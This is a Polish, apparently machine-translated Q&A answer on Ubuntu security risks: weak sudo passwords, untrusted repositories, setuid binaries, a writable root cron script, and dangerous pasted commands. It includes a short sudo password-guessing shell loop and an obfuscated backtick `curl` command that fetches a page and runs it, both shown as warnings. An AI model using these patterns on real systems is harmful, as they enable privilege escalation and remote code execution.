Złamanie hasła roota nie jest możliwe, ponieważ Ubuntu domyślnie wyłączył użytkownika root. Jeśli jednak użytkownik może zrootować się przez sudo, a hasło łatwo zgadnąć / użyć siły, masz niezabezpieczony system. Przykładowy skrypt próbujący przetestować hasło:
#!/bin/sh
for pass in password 123 ubuntu pass; do
echo $pass|sudo -S evil_command
done
Dodanie niezaufanego repozytorium umożliwia zainstalowanie programów z tego repozytorium. Nawet jeśli nie zainstalujesz wyraźnie takiej aplikacji sudo apt-get install [app-from-repo]
, repozytorium może nadal wpływać na inne programy, sprawiając, że Ubuntu uwierzy, że repozytorium zawiera nowszą wersję określonego programu.
Proces aktualizacji jest uruchamiany jako root, w przeciwnym razie nie można zapisać plików w /usr/bin
lub /etc
. Wyzwalacz instalacyjny jest również uruchamiany jako root i może być uruchamiany dowolnie i ewentualnie szkodliwe polecenia. Nie martw się, konieczne jest ręczne działanie, aby zaktualizować programy, a repozytoria Ubuntu są bezpieczne. Oprogramowaniu o zamkniętym źródle, takim jak Windows, nigdy nie można w pełni zaufać, ponieważ nie można sprawdzić źródła pod kątem złośliwego kodu, ale w razie potrzeby można przejrzeć źródło aplikacji Ubuntu (nie dotyczy programów chronionych prawami autorskimi, takich jak sun-java6
lub Flash).
Jak wspomniał Javier Rivera, błędy jądra mogą prowadzić do wykonania dowolnego kodu, ale wadliwe oprogramowanie jest również potencjalnie niebezpieczne, szczególnie błędne setsuid
pliki binarne root (pliki binarne, które będą uruchamiane przez właściciela pliku, root) i inne błędne programy działające jako root.
Możesz stworzyć luki bezpieczeństwa w systemie, jeśli nie zwracasz uwagi na to, co robisz. Na przykład, nie w pełni rozumiejąc pojęcia cronjobs, dodałeś cronjob, do /etc/cron.daily
którego uruchamia się program w twoim folderze domowym (np /bin/sh /home/your-username/myscript.sh
. Jeśli plik myscript.sh jest do zapisania, możesz go usunąć, exploit może wprowadzić złośliwe oprogramowanie kod, w myscript.sh
którym byłby uruchamiany jako root (eskalacja uprawnień).
Aby zachować bezpieczeństwo, użyj swojego umysłu! Nie uruchamiaj poleceń z niezaufanych źródeł, jeśli nie wiesz, co robi. Jeśli ktoś mówi, że biegnij `curl 3221233674`
z tykami, nie rób tego. 3221233674 to inny sposób pisania 192.0.32.10
(adres IP example.com). Byłby więc równy:
`curl http://example.com/`
Te znaczniki wsteczne powodują, że dane wyjściowe są wykonywane jako polecenia powłoki. Mówiąc wprost, „Pobierz stronę http://example.com/ i spróbuj uruchomić pobraną stronę”.
Na początku nie zobaczysz czegoś złośliwego w danym poleceniu. Ale teraz wiesz, że można go również nadużywać.
Zawsze sprawdzaj polecenia / skrypty otrzymywane z niezaufanych źródeł, takich jak Internet.